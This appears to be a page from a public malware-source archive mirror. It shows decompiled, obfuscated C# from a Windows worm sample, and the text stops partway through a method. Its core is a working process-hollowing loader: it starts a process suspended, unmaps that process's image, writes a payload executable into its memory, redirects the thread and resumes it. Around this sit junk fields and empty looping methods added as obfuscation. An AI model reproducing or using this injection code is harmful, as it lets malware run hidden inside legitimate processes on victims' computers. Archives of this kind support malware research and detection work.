mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-01 16:05:27 +00:00
872 lines
28 KiB
C#
872 lines
28 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: ajhfsdlhjasnagfgewfwsg.sadisaduoiasudoiwqueoixzucoixzuocisad
|
|||
|
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using System;
|
|||
|
using System.ComponentModel;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Reflection;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
|
|||
|
namespace ajhfsdlhjasnagfgewfwsg
|
|||
|
{
|
|||
|
internal class sadisaduoiasudoiwqueoixzucoixzuocisad
|
|||
|
{
|
|||
|
private string HMGRHOOWTYJMKSGVYLXSJXYXWQTUIT;
|
|||
|
private string GMLYNVKNGDROIKNXTAWXVQJZNTMILN;
|
|||
|
private string STJLEYRSWSSLZQNPZFVNLQZKINBMVD;
|
|||
|
private string QSNRJFNKIXAOXJVRVUUSYJKMZPUAXX;
|
|||
|
private string PSSYPLJCVCHQVBDTQKSXKCVORSMOAR;
|
|||
|
private string BZQLGPQHLQINLHDLWPSNACKZLMBSKH;
|
|||
|
private string AZUSMVMYYVQQJZKNRERSNVVBDOUGNB;
|
|||
|
private string MGSEDZUDNKRNZFKFYJQIDVKMYIJKXR;
|
|||
|
private string KFWLIFPVAPZPYYSHTYPNQOVOPLBYAL;
|
|||
|
private string JFBSOMLNNUHSWQAJONNSCHGQHNUMCF;
|
|||
|
private string VMZEFPTSCJIOMWABUSNISHWBBHJQMV;
|
|||
|
private string TMDLLWOJPOQRKOHDQHMNFAHDTKBEPP;
|
|||
|
private string SLISQCKBCTYUIHPFLXKSRTSFLMUSSJ;
|
|||
|
private string ESFFHGSGRHZQZNPXRCKIHTHRFGJWCZ;
|
|||
|
private string DSKLNMNYEMHTXFXZNRINUMSTXJBKFT;
|
|||
|
private string PZIYEQVDUBIQNLXRTWICKMHERCQOPI;
|
|||
|
private string NZMFKWRUHGQSLDETOLHIWFSGJFJCSD;
|
|||
|
private string MYRMPDMMTLYVJWMVJAFNJZDIBIBQUX;
|
|||
|
private string YFOYGGURJAZSACMNQFFDZYTTVBQUEN;
|
|||
|
private string XFTFMNQJWFHUYUUPLUDIMSDVNEJIHH;
|
|||
|
private string VEYMRUMAIKPXWNBQGKCNYLOXEHBWKB;
|
|||
|
private string HMVYJXTFYYQUMSBJMPCDOLEIZAQAUR;
|
|||
|
private string GLAFOEPXLDYWKLJLIEAIBEPKRDJOXL;
|
|||
|
private string SSXSFHWCASZTARJDOJAXREEVLXYSHA;
|
|||
|
private string RSCZLOSUNXHWZJRFJYYDDXPXDZQGJV;
|
|||
|
private string PRHGQUOLACOYXCYGFNXIQQAZUCJUMP;
|
|||
|
private string BZESIYVQQRPVNIYZLSXXGQPLPWYYWE;
|
|||
|
private string AYJZNERICWXYLAGAGHVDSJANGZQMZZ;
|
|||
|
private string YYOGTLNAPBFAKSOCBXUIFCLPYBJACT;
|
|||
|
private string KFLSKOUFFQGXAYOUICTYVCBASVYEMJ;
|
|||
|
private string JEQZQVQWRVOZYRVWDRSDHVMCKYRSOD;
|
|||
|
private string VMNMHYXBHJPWOXVOJWSSXVBNERFWYS;
|
|||
|
private string PWSZKCWCSFFRTVRRWULDYBEFNXKTDSVTXDLMIXPZMHVINK;
|
|||
|
private string NWXGQJRUFKNTRNZTSJJJLUPHFADHGNCMSWNEPEGWEOFRZK;
|
|||
|
private string ADUSHMZYVZOQHTYLYPJYBUESZTSLQCSLYQYYSDCIQCDCZG;
|
|||
|
private string YDZZNTVQHEWTFLGNTEIDNNPURWKZTWYDUJZRAKTFHKMLLG;
|
|||
|
private string KKWMEWCVXSXPVRGFZJHTDNFFLQZDDMODADKLDJPRTYLXLD;
|
|||
|
private string JJBTJDYNKXFSUKOHVYGYQGQHDTSRGGUVWWLEKRHOLGUGXC;
|
|||
|
private string HJGAPKUFWCMUSCWJQNEDCZBJVVLFIBAORPNXSYYMCNEOJC;
|
|||
|
private string TQDMGNBJMRNRIIVBWSETSZQVPPZJSQQNXJYRVXUYOCCAJZ;
|
|||
|
private string SQITMUXBZWVUGBDDRHDYFSBXHSSXVKWGTCZKDFLVFJLJVZ;
|
|||
|
private string JZXVDZBUKWSWEKVEYSYOYHWDCJYHUZYJLQFMXHPWMNDHED;
|
|||
|
private string DWKMJEAYBQETVZLXTCBTHLBKTOAPIUSXVOLWNLYEJFTDIV;
|
|||
|
private string BWPTOKWQOVMWTRTZORZYUEMMLRSDLOZQQHNPVSPBAMDMUV;
|
|||
|
private string NDMGFODUEJNTJXSRUWZOKECXFKHHVEOPWBYJYSLNMBBXUR;
|
|||
|
private string MDRNLUZMQOVVHQATQLYTXXMZXNAVXYVISUZCFZCKEIKGGR;
|
|||
|
private string LCWTQBVEDTDYFIIULAWYJRXBPQSJASBAONBVNGUHVQUPSR;
|
|||
|
private string XJTGIECJTIEVVOINRFWOZQNMJJHNKIRAUHMPQFQTHESASN;
|
|||
|
private string VJYNNLYBFNMXUGQONUUTMJYOBMABNCXSPANHXNHQZLCJEN;
|
|||
|
private string UIDUTRUSSSUASZXQIJTYYDJQSPSPQXDLLTPAFUYNQTLSQN;
|
|||
|
private string GQAGKVBXIHVWIFXIOPTOOCYBNIHTAMTKRNZUITUZCHKDQK;
|
|||
|
private string EPFNPBXPUMDZGXFKJERTBWJDELAHCGZCNGBNQBLWTPTMCJ;
|
|||
|
private string RWCZHFFUKAEWWDFDQJRJRVYPZFPLMWPCTZMHTAHIFDRYCG;
|
|||
|
private string PWHGMLALXFMYVVNELYPODPJRQHHZPQVUOTNAAHYGXLBGOG;
|
|||
|
private string OVMNSSWDJKUBTOUGGNOTQIUTIKANSKCNKMPTIOQDOSKPBF;
|
|||
|
private string ADJAJVEIZZVYJUUYMSOJGIKECEPRCASMQFZNLNMPAHJBBC;
|
|||
|
private string YCOHOCZAMEDAHMCAIHMOSBVGUGHFFUYFMYBFSVDMSOSKNC;
|
|||
|
private string XCTNUJVSYJKDFFKCDWLTFUGIMJATIPEXHRCYACUJJVCSZB;
|
|||
|
private string JJQALMDWOYMAWKKUJCKJVUVTGDPXSEUWNLNSDBQVVKAEZY;
|
|||
|
private string IIVHRTZOBDTCUDRWFRJOINGVYFHLUYAPJEPLLJHSNRJNLY;
|
|||
|
private string UQSTIWGTRRUZKJROLWJDYNVGSZWPEOQOPYZFOIDEYGIYLU;
|
|||
|
private string SPXANCCLDXCCIBZQGLHJKGGIKCPDHIWHLRBYVPUBQNRHXU;
|
|||
|
private string RPCHTJYDQCKEGUHSBAGOXZRKCFHRKCDZGKCRDWMYHVBQJU;
|
|||
|
private string DWZUKMFHGQLBWAHKIFFENZHVWYWVUSSZMENLGWIKTJZBJR;
|
|||
|
private string CVEAQTBZSVTEVSOMDUEJZSRXOBPJXMZRIXPDNDZHLQIKVQ;
|
|||
|
private string AVJHVAXRFABGTKWOYJDOMMCZGEIXZGFKEQQWVKQECYSTIQ;
|
|||
|
private string MCGUMDEWVPCDJQWGEPCECLSLAXWBJWVJKJBQYJMQOMQEHN;
|
|||
|
private string LCLBSKAOHUKGHJEIAEBJOFDNSAPPMQBBFCCJGRDOGUANUM;
|
|||
|
private string XJINJNHSXJLCXPEAGJAYEESYMTEUWFRBLWNDJQZZRIYZTJ;
|
|||
|
private string VINUPUDKKOTFWHLCBYZERXDAEWXHZAXTHPPWQXQXJQIHGJ;
|
|||
|
private string UISBUAZCWTBHUZTEXNYJEROCVZPVCUDMDIQPYFIUBXRQSI;
|
|||
|
private string GPPNLEGHMHCEKFTWDSXYUQDNQSEAMKTLJCBIBEEGMMPCSF;
|
|||
|
private string FPUURKCYZMKHIYBYYHWEGKOPHVXOOEZEEVDBILVDETZLEF;
|
|||
|
private string DOZBWRYQMRSJGQIATWVJTDZRZYPBRYGWAOEUQSMAVAITQF;
|
|||
|
private string PVWOOUFVBGTGXWISACUZJDPCTSEGBOWVGIPOTRIMHPHFQB;
|
|||
|
private string OVBUTBBNOLBJVOQUVRTEVWAELUXUEICOCBQHAZZJZWQOCB;
|
|||
|
private string ACYHKEJSEACGLUQMBWSTLWPPGOMYOXSNIVBBEYVVKLOZCY;
|
|||
|
private string ZCDOQLEJQFKIJNYOWLRZYPARXREMRSYGDODULFMSCSYIOX;
|
|||
|
private string XBIVWRABDKRLHFFQSAQEKILTPTXAUMEYZHEMTNEPUAHRAX;
|
|||
|
private string JIFHNVIGTYTIYLFIYFPTAIAFJNMEECUYFAPGWMABFOGCAU;
|
|||
|
private string IIKOSBDYFDAKWENKTUOZNBLHBQESGWAQBTQZDTRYXVPLNT;
|
|||
|
private string GIPVYIZQSIINUWVMPJNEZUWJTSXGJQGJWMSSLAIVPDZUZT;
|
|||
|
private string TPMHPLHUIXJJKCVEVPMTPUMUNMMKTGWICGDMOAEHARXFZQ;
|
|||
|
private string ROROVSCMVCRMIUCGQELZCNWWFPEYWADAYZEFVHVFSZGOLP;
|
|||
|
private string DVOBMVKRKRSJYACYWJKOSNMHZITCGPSAETPZYGRQDNFALM;
|
|||
|
private string CVTIRCGJXWALXTKASYJUFGXJRLMQJKZSAMQSGNIOVVOIXM;
|
|||
|
private string AVYPXJBBKBIOVLSCNNIZRAILJOEELEFLVFSKOVALNCYRJM;
|
|||
|
private string NCVBOMJFZPJLLRSUTSHOHZXWDHTIVTVKBZDERUWXYRWDJI;
|
|||
|
private string LBAIUTFXMURNJJZWOHGUUTIYVKMWYOBDXSEXYBNUQYFLVI;
|
|||
|
private string KBFPZZAPZAZQHCHYKWEZGMTAMNFKBIHVTLGQGJERIFPUHI;
|
|||
|
private string WICBQDIUOOANYIHQQCEOWLILHGTOLYXUZFQKJIADTUNGHE;
|
|||
|
private string UIHIWJEMBTIPWAPSLRDUJFTNZJMCOSDNUYSDQPRALBXPTE;
|
|||
|
private string GPEVNNLQRIJMMGPKSWCJZEJZTDBGYHTMARDXTONMWQVATB;
|
|||
|
private string FOJBTTHIENRPKYWMNLBOLYUBLFUUACZFWKEQBVEJOXFJGA;
|
|||
|
private string EOOIYADAQSZRIREOIAZUYRFDCIMIDWGXSDGIJDWGGFOSSA;
|
|||
|
private string QVLVPDKFGHAOZXEGOFZJORUOXCBMNLWXYXQCMCRSRTMDSX;
|
|||
|
private string OVQCVKGWTMIRXPMIKUYPAKFQOEUAQGCPTQSVTJJPJAWMEX;
|
|||
|
|
|||
|
[DebuggerNonUserCode]
|
|||
|
public sadisaduoiasudoiwqueoixzucoixzuocisad()
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
public static void Execute(byte[] data) => sadisaduoiasudoiwqueoixzucoixzuocisad.Execute(data, Assembly.GetEntryAssembly().Location);
|
|||
|
|
|||
|
public static void Execute(byte[] data, string target)
|
|||
|
{
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Context context = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Context();
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Process_Information processInformation = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Process_Information();
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Startup_Information structure1 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Startup_Information();
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags securityFlags1 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags();
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags securityFlags2 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags();
|
|||
|
GCHandle gcHandle = GCHandle.Alloc((object) data, GCHandleType.Pinned);
|
|||
|
IntPtr ptr = gcHandle.AddrOfPinnedObject();
|
|||
|
int int32 = ptr.ToInt32();
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header dosHeader1 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header();
|
|||
|
object structure2 = Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), dosHeader1.GetType());
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header dosHeader2;
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header dosHeader3 = structure2 != null ? (sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header) structure2 : dosHeader2;
|
|||
|
gcHandle.Free();
|
|||
|
string str1 = (string) null;
|
|||
|
ref string local1 = ref str1;
|
|||
|
ref string local2 = ref target;
|
|||
|
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags local3 = ref securityFlags1;
|
|||
|
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags local4 = ref securityFlags2;
|
|||
|
IntPtr num1;
|
|||
|
IntPtr system = num1;
|
|||
|
string str2 = (string) null;
|
|||
|
ref string local5 = ref str2;
|
|||
|
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Startup_Information local6 = ref structure1;
|
|||
|
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Process_Information local7 = ref processInformation;
|
|||
|
if (-(sadisaduoiasudoiwqueoixzucoixzuocisad.H.CreateProcess(ref local1, ref local2, ref local3, ref local4, false, 4U, system, ref local5, ref local6, out local7) ? 1 : 0) == 0)
|
|||
|
return;
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers ntHeaders1 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers();
|
|||
|
ptr = new IntPtr(checked (int32 + dosHeader3.Address));
|
|||
|
object structure3 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType());
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers ntHeaders2;
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers ntHeaders3 = structure3 != null ? (sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers) structure3 : ntHeaders2;
|
|||
|
structure1.CB = Marshal.SizeOf((object) structure1);
|
|||
|
context.Flags = 65538U;
|
|||
|
if (ntHeaders3.Signature != 17744U | dosHeader3.Magic != (ushort) 23117)
|
|||
|
return;
|
|||
|
int num2 = sadisaduoiasudoiwqueoixzucoixzuocisad.H.GetThreadContext(processInformation.Thread, ref context) ? 1 : 0;
|
|||
|
IntPtr process1 = processInformation.Process;
|
|||
|
IntPtr address1 = (IntPtr) checked ((long) context.Ebx + 8L);
|
|||
|
IntPtr num3;
|
|||
|
ref IntPtr local8 = ref num3;
|
|||
|
IntPtr size1 = (IntPtr) 4;
|
|||
|
int num4 = 0;
|
|||
|
ref int local9 = ref num4;
|
|||
|
int num5 = sadisaduoiasudoiwqueoixzucoixzuocisad.H.ReadProcessMemory(process1, address1, ref local8, size1, ref local9) >= 0 ? 1 : 0;
|
|||
|
if ((num2 & num5 & (sadisaduoiasudoiwqueoixzucoixzuocisad.H.ZwUnmapViewOfSection(processInformation.Process, num3) >= 0L ? 1 : 0)) == 0)
|
|||
|
return;
|
|||
|
uint num6 = checked ((uint) (int) sadisaduoiasudoiwqueoixzucoixzuocisad.H.VirtualAllocEx(processInformation.Process, (IntPtr) (long) ntHeaders3.Optional.Image, ntHeaders3.Optional.SImage, 12288U, 4U));
|
|||
|
if (num6 == 0U)
|
|||
|
return;
|
|||
|
IntPtr process2 = processInformation.Process;
|
|||
|
IntPtr address2 = (IntPtr) (long) num6;
|
|||
|
byte[] buffer1 = data;
|
|||
|
IntPtr sheaders = (IntPtr) (long) ntHeaders3.Optional.SHeaders;
|
|||
|
uint num7;
|
|||
|
int num8 = checked ((int) num7);
|
|||
|
ref int local10 = ref num8;
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.WriteProcessMemory(process2, address2, buffer1, sheaders, out local10);
|
|||
|
uint num9 = checked ((uint) num8);
|
|||
|
long num10 = (long) checked (dosHeader3.Address + 248);
|
|||
|
int num11 = checked ((int) ntHeaders3.File.Sections - 1);
|
|||
|
int num12 = 0;
|
|||
|
int num13;
|
|||
|
while (num12 <= num11)
|
|||
|
{
|
|||
|
ptr = new IntPtr(checked ((long) int32 + num10 + (long) (num12 * 40)));
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Section_Header sectionHeader1;
|
|||
|
object structure4 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType());
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Section_Header sectionHeader2;
|
|||
|
sectionHeader1 = structure4 != null ? (sadisaduoiasudoiwqueoixzucoixzuocisad.H.Section_Header) structure4 : sectionHeader2;
|
|||
|
byte[] numArray = new byte[checked ((int) sectionHeader1.Size + 1)];
|
|||
|
int num14 = checked ((int) ((long) sectionHeader1.Size - 1L));
|
|||
|
int index = 0;
|
|||
|
while (index <= num14)
|
|||
|
{
|
|||
|
numArray[index] = data[checked ((int) ((long) sectionHeader1.Pointer + (long) index))];
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
IntPtr process3 = processInformation.Process;
|
|||
|
IntPtr address3 = (IntPtr) (long) checked (num6 + sectionHeader1.Address);
|
|||
|
byte[] buffer2 = numArray;
|
|||
|
IntPtr size2 = (IntPtr) (long) sectionHeader1.Size;
|
|||
|
num13 = checked ((int) num9);
|
|||
|
ref int local11 = ref num13;
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.WriteProcessMemory(process3, address3, buffer2, size2, out local11);
|
|||
|
num9 = checked ((uint) num13);
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.VirtualProtectEx(processInformation.Process, (IntPtr) (long) checked (num6 + sectionHeader1.Address), (UIntPtr) sectionHeader1.Misc.Size, (UIntPtr) checked ((ulong) sadisaduoiasudoiwqueoixzucoixzuocisad.Protect((long) sectionHeader1.Flags)), checked ((uint) (int) num3));
|
|||
|
checked { ++num12; }
|
|||
|
}
|
|||
|
byte[] bytes = BitConverter.GetBytes(num6);
|
|||
|
IntPtr process4 = processInformation.Process;
|
|||
|
IntPtr address4 = (IntPtr) checked ((long) context.Ebx + 8L);
|
|||
|
byte[] buffer3 = bytes;
|
|||
|
IntPtr size3 = (IntPtr) 4;
|
|||
|
num13 = checked ((int) num9);
|
|||
|
ref int local12 = ref num13;
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.WriteProcessMemory(process4, address4, buffer3, size3, out local12);
|
|||
|
num7 = checked ((uint) num13);
|
|||
|
context.Eax = checked (num6 + ntHeaders3.Optional.Address);
|
|||
|
sadisaduoiasudoiwqueoixzucoixzuocisad.H.SetThreadContext(processInformation.Thread, ref context);
|
|||
|
int num15 = (int) sadisaduoiasudoiwqueoixzucoixzuocisad.H.ResumeThread(processInformation.Thread);
|
|||
|
}
|
|||
|
|
|||
|
private static long Protect(long flags)
|
|||
|
{
|
|||
|
if (flags < 0L)
|
|||
|
checked { flags += 4294967296L; }
|
|||
|
return new long[8]
|
|||
|
{
|
|||
|
1L,
|
|||
|
16L,
|
|||
|
2L,
|
|||
|
32L,
|
|||
|
4L,
|
|||
|
64L,
|
|||
|
4L,
|
|||
|
64L
|
|||
|
}[checked ((int) Math.Round(unchecked ((double) flags / 841.0)))];
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_FuQDHuMY2025034873()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
double num = 0.2710239;
|
|||
|
do
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
++num;
|
|||
|
}
|
|||
|
while (num <= 0.4629713);
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_lmwQbUgmOoeI2002682959()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
while (true)
|
|||
|
;
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_gpwuQobJL341053670()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
double num1 = 0.7916495;
|
|||
|
do
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
++num1;
|
|||
|
}
|
|||
|
while (num1 <= 0.8058189);
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
double num2 = 0.2101725;
|
|||
|
do
|
|||
|
{
|
|||
|
++num2;
|
|||
|
}
|
|||
|
while (num2 <= 0.2262142);
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_YgPWEqqfBWlFrUpB16952860()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
if (0.2939498 <= 0.07052416)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
while (true)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
while (true)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_geuXkWHFMaMChUIt864161822()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
while (true)
|
|||
|
;
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_nECAJKceBhUUNawb1480997800()
|
|||
|
{
|
|||
|
while (true)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_dpaMDuVkjPnwS530910597()
|
|||
|
{
|
|||
|
while (true)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_ERBqFbRB105420778()
|
|||
|
{
|
|||
|
for (double num = 0.3396568; num <= 0.2412645; ++num)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
double num1 = 0.849157;
|
|||
|
while (num1 <= 0.2866166)
|
|||
|
++num1;
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_GRTXFOXDbbgxjbWoJU1859221943()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
double num = 0.005078852;
|
|||
|
do
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
++num;
|
|||
|
}
|
|||
|
while (num <= 0.6185946);
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_nmrQWLk2018461527()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
if (0.9356374 <= 0.7325586)
|
|||
|
{
|
|||
|
while (true)
|
|||
|
;
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
while (true)
|
|||
|
;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_qnTBP1344562940()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
while (true)
|
|||
|
;
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_YDRyFFHWgsSUjghdyN275736892()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
while (true)
|
|||
|
;
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_QsKIdRqHskVT85619494()
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_omKFvdbkavhuVbIfK892757530()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
